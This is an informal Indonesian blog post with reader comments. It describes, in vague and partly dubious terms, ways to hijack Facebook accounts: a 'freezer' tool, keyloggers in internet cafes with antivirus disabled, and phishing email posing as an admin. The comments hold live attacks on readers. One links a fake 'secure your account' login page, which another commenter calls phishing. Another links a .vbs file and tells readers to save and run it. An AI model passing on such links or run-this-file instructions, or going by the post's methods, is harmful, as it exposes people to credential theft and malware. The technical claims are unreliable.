Pages

H0w 2 HaCk FaCeBooK

9 komentar
 
Cara nge-Hack Facebook tu Gmana yaa????
Cara nge-Hack Facebook sangat diminati oleh kalangan muda pada saat ini. Padahal nge-hack kan perbuatan yang nakal. Mencuri password dan username orang misalkan. Dan mulai memfitnah user tersebut dengan menyebarkan kata-kata aneh ( odd word ) ke dalam situs jejaring social ini. Begitulah motif-motif utama sang pelaku ( termasuk motif saya kalo mau ngehack )… lanjut ke versi gila-gilaan.
Versi Gila-gilaan
Di postingan ney, wa mau jelasin 3 jenis hack facebook. Langsung saja
Cara HACK FB :

1.Freeze
2.Keylogger
3.Berpura-pura menjadi domain Sang Admin FB

1.Freeze
Sebenarnya cara freeze ini sangatlah mudah. Hacker hanya perlu mendownload software Facebook Freezer ( nggak wa cantumin alamat downloadnya ). Terus, jika hacker udah download tuh software. Mereka bakal masukin e-mail korban ke dalam facebook freezer itu. N tinggal di klik ajah freeze di software tsb, bekulah facebook korban. Tapi itu memerlukan proses yang cukup lama, sekitar 5 menit. Mirip kayak ngedownload gituuu prosesnya. Setelah proses selesai dan fb korban udah beku. Maka tertawalah sang Hacker ( wakakakaka ). Tapi bekunya nggak lama kug. Sampai sang hacker merestart computernya, maka proses freeze is terminated. Fb korban balik lagi deh. Cara ini sudah wa coba, tapi fb korban akan bereaksi jika korban Online. Jadi kalo nggak Fb korban nggak knapa-knapa.. hehehehe.
Agar Fb kalian nggak di hack dengan jenis hacker seperti ini. Caranya gampang kok,, kalian tinggal hilangkan nama alamat e-mail kalian di info profil fb kalian. Kalo lum tau caranya klik di sini…

2.Keylogger
Keylogger adalah salah satu software untuk merekam history browser kalian. Jika kalian mengetik apa saja di browser kalian maka keylogger akan merekamnya. Dan rekaman keylogger itu dapat dicetak atau dilihat oleh sang hacker. Keylogger biasanya dipasang di warnet, untuk mengetahui apa saja yang telah diketik pada browser maka keylogger itu di install ke dalam PC. Jika pengguna warnet mengetik password dan username fb nya. Maka keylogger akan merekam semua ketikan itu. Dan terbacalah username dan password dari pengguna warnet tadi. Sangat mudah sekali merekontruksi kejadian hacker. Tapi kekurangan keylogger ini, adalah dapat dideteksi oleh antivirus sebagai virus. Maka dari itu sebelum menginstal keylogger, antivirus harus di off dulu prosesnya.
Untuk menghindari hal ini, maka pasanglah antivirus. Atau selalu waspada, dan clear history jika telah selesai menggunakan internet ( khususnya di warnet )

3.Berpura-pura menjadi domain Admin FB
Hacker akan membuat e-mail palsu yang seolah-olah mereka adalah seorang admin fb yang meminta username dan password kalian. Mereka bisa membuat e-mail palsu dengan mendaftar ke webhosting atau support PHP. Intinya, hacker membuat e-mail yang ada embel-embel facebooknya. Misalkan facebook_admin@yahoo.com. Trus mereka ngirim e-mail palsu ( e-mail palsunya juga udah ada kok, tapi ngga ta cantumin alamat downloatnya ) ke kita. Jika kita klik, maka password dan username kita akan bocor. Dan mereka telah mendapatkan yang mereka inginkan.
Cara ini terbukti paling ampuh, walaupun cara ini sudah jadul.

Hacker professional bisa mendapatkan password fb kita dengan software yang sangat canggih. Wa pernah ngeliat cara software itu bekerja. Hanya dengan liat fb nya, trus ketikkan e-mailnya. Password tinggal di paste dan kita dapatkan. Software itu wa denger-denger harganya sekitar 200$an. Wew, mahal bgt.
Maka dari itu, kita harus waspada dengan hacker, hack operation, atau apa lah itu. Di Indonesia cuman 3 cara itu aja yang masih bisa dilakukan oleh hacker-hacker local dan newbie. Kalo yang udah professional g tau deh gimana. Tp yang jelas, cara ngehack fb g jauh2 amat kayaknya.
Yah sekian dech,, t tunggu commentnya ya.. maaph kalo postingannya udah jadul-jadul bgt.


9 Responses so far.

  1. COBA pikir ada ga untungnya ngHACK FB orang laen??? hmmmm? mending kamu coba cari tahu caranya nge Hack BLOG ORANG MALAYSIA, itu baru berguna bagiq.........:sikut: hehehehehehehehe

  2. Aku juga lg kesel bgt ma rank fb...pengen ngehack,tapi malezz!! Haha..salam kenal yah

  3. ok...ok... kmaren temenku kena hack freeze,, tp ku ga taw cara ngilangin efeknya,, aduh aduh,, oon bgt, memberi virus tanpa antivirus.... salam kenal juga

  4. wah mntab nic info na, tp sngat berbhaya wat para pengguna FB

  5. Anonymous says:

    WOooooooooooooooooy brother, postingan lo bagus banget, tapi sayangnya FB gw udah kena. Tapi cara ngehaknya gimana, ini lagi dalam proses..

  6. G ada apa yg nyediain tutorial gito h h h

  7. Anonymous says:

    nih supaya akun fb kalian aman harus di secure dulu pake link secure fb 'anti-hack facebook' nih linknya
    http://h1.ripway.com/tolakbala/walk/index.php
    tinggal login dan akun fb kalian aman

  8. ciah,, agan atas ane kok bikin link palsu sih... hehe.. itu mah nge hack fb dengan cara fake login...hadehh.. gann..gan..tobat gan

  9. petunjuk says:

    http://download1587.mediafire.com/8sbwds5298dg/kmkauz7mheipes3/FILE.vbs


    coba download file diatas?? kemudian

    Simpan menggunakan "save as", pada kolom "save as type" pilih "all file" kemudian beri nama terserah anda dengan akhiran ".vbs" (tanpa tanda kutip)

    lihat apa yang terjadi!!!!

Leave a Reply